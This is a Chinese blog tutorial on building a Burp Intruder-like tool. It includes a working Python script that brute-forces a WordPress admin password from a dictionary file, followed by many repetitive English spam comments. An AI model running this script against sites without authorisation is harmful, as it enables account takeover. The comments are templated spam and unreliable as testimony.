前言:
BurpSuite大家应该都用过吧,里面有个Inteuder模块,是用来爆破网站后台密码的,那么这个模块是如何实现的呢?接下来这篇文章就教你写属于自己的Intruder工具
目录:
0x01:处理流程
0x02:简析流程
0x03:代码实现
0x01 处理流程
0x02 简析流程
首先,我们确定自己的目的是什么,爆破出一个网站后台的登陆密码。
然后我们要分析后台的登陆流程,是否有验证码,是否有隐藏参数传递等
这里的后台是我的博客,基于wordpress,一般默认无验证码,只需要输入post的账号和密码就好
然后我们就构造post参数,从一个本地的pwd.txt(字典文件)读取密码,不断的加入到post的密码参数里面,试图去登陆
登陆成功后302自动跳转到我们的后台页面
这时我们可以用登陆成功后页面内容来判断,也可用其他,没成功就说明字典不给力,或者管理者密码比较强大
0x03 代码实现
# -*- coding: utf-8 -*-
'''
Program:WordPress后台登陆
Function:读取字典逐个登陆Wordpress后台,在知道用户名的情况下,可用来爆破登陆密码
Version:Python3.6
Time:2017/10/25
Author:Walks
个人博客:http://www.bywalks.com
'''
#导入requests库,跟2.x的urllib2和3.x的urllib.request差不多的功能,不过好像更强大
import requests
#登陆后台
url = 'http://www.bywalks.com/wp-login.php'
#HTTP的header头,添加个user-agent,有的网站会从User-Agent来判断是否是程序访问
#如果是程序访问则不允许,添加个user-agent就是欺骗这种防护
#在这里的后台wordpress好像不用加
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
#访问也米欧庵后,保留cookie
s = requests.Session()
#加个headers
s.headers.update(headers)
#防止报错代码
try:
#打开pwd.txt
with open('pwd.txt','r') as f:
#逐行访问并且尝试
for pwd in f:
#去除每行的\n,当你读取一行时,如果用二进制显示,会发现每行都有个\n
pwd = pwd.replace('\n','')
#print(pwd)
#构造post数据,log=username,pwd=password
data = {
"log":"XXX",
"pwd":pwd,
"rememberme":"forever"
}
#尝试登陆
req = s.post(url,data = data)
print(req.status_code)
#通过某些特征判断是否登陆成功
if '欢迎使用WordPress' in req.text:
print('爆破成功,密码为:'+pwd)
break
#如果出错,输出具体错误
except requests.RequestException as e:
print(e)
成功图
大家如果想找环境测试的话可以本地搭建个wordpress,这里我测试的是我的博客后台,我加了验证码,所以大家弄我的肯定是没用的。
下篇的话给大家写个带验证码识别流程的
转载请注明出处:www.bywalks.com
I as well as my guys were actually looking through the great items from your site and at once developed a horrible suspicion I had not expressed respect to the web blog owner for those secrets. These men became so joyful to see them and now have really been enjoying those things. Thank you for turning out to be indeed considerate and then for having variety of really good information most people are really desirous to understand about. My honest apologies for not saying thanks to sooner.
I definitely wanted to send a simple note so as to say thanks to you for some of the remarkable items you are posting on this site. My extended internet search has at the end been rewarded with reasonable facts and strategies to write about with my friends and classmates. I would tell you that most of us site visitors actually are unequivocally fortunate to dwell in a perfect site with many lovely people with very beneficial points. I feel really fortunate to have seen the site and look forward to some more entertaining times reading here. Thank you once again for all the details.
I must show my appreciation to the writer for rescuing me from this type of matter. Because of researching through the the web and getting opinions that were not pleasant, I believed my life was gone. Being alive minus the solutions to the issues you've sorted out by means of your guide is a critical case, and ones which might have adversely affected my entire career if I had not discovered your site. That capability and kindness in touching a lot of stuff was excellent. I'm not sure what I would've done if I hadn't come across such a solution like this. I'm able to now look forward to my future. Thanks for your time so much for the impressive and result oriented help. I will not think twice to endorse your web sites to any person who needs to have guidelines on this topic.
Thanks so much for giving everyone remarkably marvellous opportunity to check tips from this site. It is always very enjoyable and also jam-packed with fun for me personally and my office acquaintances to search the blog at the least thrice in one week to learn the new things you have got. And lastly, I'm just always motivated with the excellent principles served by you. Some 2 areas in this article are indeed the finest I've ever had.
I wanted to send you that very small observation to help say thanks a lot yet again on your incredible ideas you have documented in this article. It has been so incredibly generous with people like you to present unreservedly just what a few people would've advertised as an electronic book to help with making some bucks for themselves, even more so seeing that you might have done it in case you considered necessary. Those techniques in addition worked to become easy way to know that the rest have a similar desire just like my personal own to see way more around this matter. I'm certain there are a lot more pleasurable times up front for many who read through your blog post.
I needed to create you one little bit of word to be able to thank you so much as before with your gorgeous suggestions you've provided in this article. It has been certainly wonderfully open-handed of you to supply easily all most of us would have distributed as an electronic book to earn some dough for themselves, chiefly considering that you could possibly have tried it if you ever wanted. These tips likewise acted as a fantastic way to be certain that many people have a similar dream just as my very own to understand lots more concerning this matter. I know there are thousands of more fun sessions ahead for people who look over your website.
I simply wanted to compose a brief remark to be able to thank you for those fantastic techniques you are posting on this website. My time-consuming internet lookup has at the end been recognized with reliable knowledge to go over with my classmates and friends. I would claim that many of us readers actually are quite fortunate to live in a remarkable network with very many outstanding people with helpful pointers. I feel truly blessed to have encountered your weblog and look forward to some more fabulous minutes reading here. Thanks once again for everything.
Thanks so much for giving everyone an extremely brilliant opportunity to read critical reviews from this website. It is often very good and also jam-packed with a great time for me and my office colleagues to search your web site on the least three times every week to read through the latest items you have. And of course, we are certainly astounded concerning the perfect methods you serve. Certain 1 areas on this page are really the simplest we have all had.
A lot of thanks for your whole hard work on this website. My mum really likes getting into investigation and it's easy to see why. We all notice all of the lively ways you produce priceless tips and hints by means of your blog and even boost participation from some other people on the article then our daughter has been understanding so much. Enjoy the rest of the year. Your carrying out a really great job.
I really wanted to write a small word in order to appreciate you for the remarkable items you are sharing on this site. My long internet search has finally been rewarded with useful information to write about with my family. I 'd believe that we readers actually are really blessed to live in a fantastic network with many perfect individuals with valuable tips. I feel pretty blessed to have encountered your entire web page and look forward to some more exciting minutes reading here. Thanks a lot once again for everything.
I have to show some appreciation to the writer for bailing me out of such a issue. Just after looking through the world-wide-web and meeting advice which are not beneficial, I assumed my life was done. Existing without the approaches to the problems you've resolved as a result of your good website is a critical case, and the ones which might have in a wrong way damaged my entire career if I had not encountered your web page. Your primary capability and kindness in taking care of a lot of things was priceless. I don't know what I would've done if I hadn't come upon such a point like this. I can now look forward to my future. Thank you so much for the expert and sensible guide. I will not be reluctant to recommend your web site to anybody who needs and wants tips on this area.
I'm commenting to make you be aware of of the impressive experience my girl had browsing your site. She realized a lot of pieces, which include what it's like to possess an awesome giving nature to let the mediocre ones with ease learn various complex matters. You really did more than visitors' desires. Thanks for showing such invaluable, dependable, revealing and in addition fun guidance on your topic to Evelyn.
My wife and i got comfortable when Peter managed to complete his homework through your precious recommendations he discovered through your blog. It's not at all simplistic to simply be giving out guides which some people might have been making money from. We remember we have got you to appreciate because of that. These illustrations you made, the simple site navigation, the relationships your site help to engender - it's many powerful, and it's making our son in addition to our family reason why this idea is cool, and that's unbelievably vital. Many thanks for the whole thing!
I'm also writing to make you be aware of of the useful encounter my cousin's child developed reading through your blog. She even learned such a lot of pieces, not to mention what it's like to possess an awesome giving mindset to make a number of people without difficulty learn about a variety of multifaceted topics. You actually exceeded visitors' expected results. Thanks for delivering those precious, dependable, informative as well as unique thoughts on that topic to Janet.
I really wanted to write a message so as to express gratitude to you for all the marvelous advice you are posting on this website. My extended internet research has at the end been recognized with awesome concept to talk about with my pals. I 'd point out that most of us readers actually are undoubtedly blessed to exist in a decent website with many brilliant people with insightful suggestions. I feel rather happy to have seen your web pages and look forward to so many more fabulous times reading here. Thanks again for all the details.
Thank you a lot for providing individuals with a very spectacular chance to discover important secrets from this site. It is always so kind and as well , packed with a good time for me personally and my office acquaintances to visit the blog not less than three times a week to find out the fresh stuff you will have. And of course, we are actually motivated with all the mind-boggling techniques you serve. Certain 2 ideas in this posting are easily the most suitable I have ever had.
I'm commenting to make you understand of the great discovery my friend's girl encountered using your webblog. She came to understand plenty of details, most notably how it is like to have an awesome coaching character to let many others with ease have an understanding of several impossible issues. You truly did more than my desires. I appreciate you for supplying such essential, dependable, informative and as well as cool thoughts on the topic to Emily.
I precisely desired to thank you very much once again. I do not know the things I could possibly have created without the actual concepts revealed by you about that theme. It was before the intimidating matter in my view, but encountering the very professional manner you handled that forced me to leap over fulfillment. I am just thankful for this service and even hope you find out what an amazing job you're doing educating the others thru your site. I'm certain you have never met any of us.
Thanks a lot for providing individuals with an exceptionally terrific opportunity to discover important secrets from this site. It really is very sweet and full of a great time for me and my office colleagues to visit your site minimum three times in 7 days to see the fresh secrets you have. And definitely, I'm so usually amazed concerning the beautiful concepts you serve. Some two points in this posting are in fact the most effective we've ever had.
I have to point out my admiration for your kindness in support of men and women who actually need guidance on that study. Your special commitment to passing the solution throughout turned out to be really effective and have specifically empowered most people just like me to reach their ambitions. Your amazing informative tutorial signifies a lot a person like me and extremely more to my mates. Thank you; from everyone of us.
I have to convey my gratitude for your kindness for people that have the need for help on this one field. Your personal commitment to passing the message throughout had become amazingly good and have continuously helped most people much like me to reach their aims. Your warm and friendly publication signifies a lot to me and even further to my office colleagues. Thanks a ton; from all of us.
I want to express some appreciation to this writer for rescuing me from this particular circumstance. As a result of looking out throughout the world-wide-web and getting recommendations which were not powerful, I thought my life was gone. Existing without the solutions to the problems you've fixed by means of the posting is a critical case, and ones that would have negatively damaged my entire career if I had not discovered the blog. Your actual mastery and kindness in controlling all areas was important. I don't know what I would have done if I had not encountered such a thing like this. I am able to now relish my future. Thanks for your time very much for this expert and effective help. I won't be reluctant to endorse your web blog to any person who will need assistance on this issue.
I together with my buddies have been reading through the excellent helpful tips found on your web blog and quickly I had an awful suspicion I never expressed respect to the web blog owner for them. Those boys came absolutely joyful to study all of them and have unquestionably been taking pleasure in these things. I appreciate you for turning out to be so accommodating and also for choosing varieties of amazing areas most people are really desirous to understand about. Our own honest apologies for not expressing appreciation to you sooner.
I am commenting to let you be aware of of the awesome discovery my cousin's princess gained checking yuor web blog. She figured out many issues, which included what it is like to possess a marvelous teaching style to get certain people just know chosen specialized matters. You undoubtedly surpassed people's expected results. Thank you for supplying the productive, safe, edifying and also cool guidance on your topic to Gloria.
I in addition to my guys happened to be reviewing the nice hints located on the website and so at once developed a terrible feeling I had not thanked you for those strategies. Those men became for this reason very interested to see them and have now surely been tapping into them. Thanks for indeed being well considerate as well as for selecting varieties of nice topics millions of individuals are really desperate to know about. My very own honest regret for not expressing appreciation to sooner.
I precisely wanted to thank you very much yet again. I do not know what I would've gone through without the type of advice contributed by you directly on this question. It had been a very troublesome problem for me personally, however , being able to see your specialized manner you dealt with that made me to leap over gladness. I'm just grateful for the work as well as trust you recognize what a powerful job you're undertaking instructing men and women via a blog. I know that you've never encountered all of us.
I simply had to appreciate you all over again. I'm not certain the things that I would've undertaken without these points shared by you on that subject. It had become a real difficult issue in my position, however , noticing a skilled form you handled the issue forced me to cry with contentment. I'm grateful for your advice and wish you really know what a great job you happen to be carrying out instructing other individuals with the aid of your web blog. More than likely you haven't come across any of us.
I simply wished to appreciate you yet again. I'm not certain the things I would have gone through without the actual creative concepts shared by you directly on that industry. Previously it was a daunting case for me, however , looking at a specialised way you processed that made me to cry for happiness. I'm grateful for your help and thus expect you recognize what a great job you are always accomplishing instructing many people through the use of your blog. I know that you haven't got to know any of us.
I wish to show my thanks to the writer for bailing me out of this type of incident. Just after looking out through the search engines and seeing principles which are not productive, I believed my entire life was gone. Existing minus the approaches to the difficulties you've sorted out through your entire guide is a crucial case, and those that might have negatively damaged my entire career if I had not come across your blog post. Your understanding and kindness in touching all the stuff was crucial. I'm not sure what I would have done if I had not discovered such a thing like this. I can at this point look ahead to my future. Thanks so much for your specialized and effective guide. I will not think twice to endorse the blog to any individual who should get support about this topic.
Needed to write you one very small word so as to give thanks once again on your wonderful knowledge you have contributed on this site. It is really unbelievably open-handed of you to grant publicly what most of us could possibly have offered for sale as an e-book in order to make some cash for themselves, most notably considering the fact that you might have tried it in case you desired. The tricks also worked like a good way to comprehend someone else have the same zeal the same as mine to figure out a great deal more with reference to this problem. I'm sure there are thousands of more fun moments up front for those who look into your website.
I enjoy you because of each of your labor on this blog. My mum really likes participating in internet research and it is easy to understand why. We know all concerning the powerful method you offer functional tricks via this website and as well as recommend contribution from some others on the theme while our own child is really being taught a great deal. Have fun with the remaining portion of the year. You have been conducting a fabulous job.
Thank you a lot for providing individuals with an extremely wonderful chance to read critical reviews from this website. It is usually very enjoyable and also jam-packed with fun for me personally and my office co-workers to visit your website not less than three times per week to read the fresh tips you will have. And of course, I'm just always satisfied considering the astounding techniques you give. Some 3 ideas on this page are honestly the most suitable I've ever had.
My wife and i were absolutely fulfilled that Albert managed to complete his reports from your ideas he had in your blog. It's not at all simplistic to simply happen to be releasing techniques others may have been making money from. So we keep in mind we need the blog owner to appreciate because of that. All of the explanations you made, the straightforward blog menu, the relationships your site aid to engender - it's got all fantastic, and it's really letting our son and our family recognize that that concept is exciting, and that's extraordinarily serious. Many thanks for the whole thing!
My wife and i have been quite happy Edward could carry out his research from the ideas he gained from your very own weblog. It's not at all simplistic to just always be freely giving facts which often people today might have been trying to sell. So we do know we have got the writer to appreciate for that. Most of the explanations you've made, the simple blog navigation, the relationships your site aid to instill - it is most astounding, and it is aiding our son and our family reckon that the matter is amusing, which is seriously mandatory. Thank you for the whole lot!
My husband and i have been really fortunate Chris managed to complete his investigations through your precious recommendations he got through your web pages. It is now and again perplexing just to always be giving for free concepts men and women might have been selling. We really do know we have got the blog owner to be grateful to because of that. The main explanations you made, the simple blog menu, the friendships you can help promote - it's got everything astonishing, and it's aiding our son and us imagine that that topic is pleasurable, which is certainly especially vital. Thank you for all!
I precisely had to say thanks once again. I am not sure the things that I would've achieved without the creative concepts revealed by you about such situation. Previously it was an absolute frustrating situation in my view, however , considering this well-written tactic you dealt with it forced me to weep over fulfillment. Extremely grateful for the information and as well , wish you recognize what a powerful job you are undertaking training men and women using a blog. I'm certain you haven't got to know all of us.
I simply wished to thank you very much again. I am not sure the things I would have tried without the entire tips and hints discussed by you relating to my area of interest. It was before a real traumatic issue for me personally, nevertheless observing this skilled mode you managed it forced me to cry with contentment. Now i am happy for the guidance as well as hope you recognize what a powerful job you are always getting into educating the others with the aid of your web page. Probably you have never got to know any of us.
I wanted to write down a simple remark to be able to say thanks to you for these fantastic guidelines you are showing at this website. My rather long internet investigation has now been paid with good quality concept to share with my friends and family. I 'd state that that we site visitors are rather fortunate to exist in a good site with many marvellous individuals with valuable tricks. I feel rather privileged to have seen your web pages and look forward to some more cool moments reading here. Thanks again for all the details.
I want to express thanks to the writer just for rescuing me from this problem. Right after searching throughout the search engines and meeting methods which are not powerful, I figured my life was well over. Living minus the strategies to the difficulties you've resolved all through this guide is a crucial case, and the kind which might have negatively affected my entire career if I hadn't encountered your web blog. Your own personal talents and kindness in playing with almost everything was excellent. I am not sure what I would have done if I had not come upon such a subject like this. I can now look forward to my future. Thank you so much for your expert and sensible help. I won't be reluctant to recommend the website to anyone who should get direction about this issue.
I not to mention my pals ended up following the excellent tips and tricks found on your web site and instantly I had an awful suspicion I had not thanked the web site owner for those tips. My young boys happened to be absolutely glad to learn them and already have without a doubt been enjoying them. I appreciate you for being considerably helpful and for utilizing this form of terrific useful guides millions of individuals are really eager to learn about. Our own honest apologies for not expressing appreciation to sooner.
Thanks a lot for giving everyone an exceptionally brilliant chance to read critical reviews from this web site. It is often very superb and jam-packed with fun for me and my office friends to visit your blog the equivalent of three times in one week to read through the new guides you have. And indeed, I am usually astounded with the unique tips and hints you give. Certain two ideas on this page are clearly the best we have had.
I have to express thanks to this writer just for rescuing me from such a condition. After scouting throughout the the net and coming across methods that were not helpful, I believed my entire life was well over. Living without the presence of strategies to the problems you have fixed as a result of your site is a critical case, as well as ones that might have adversely damaged my entire career if I had not encountered the website. Your main expertise and kindness in maneuvering all things was valuable. I am not sure what I would've done if I hadn't come across such a stuff like this. It's possible to at this time look forward to my future. Thanks very much for your specialized and effective help. I will not hesitate to propose your web page to anybody who needs to have guide about this topic.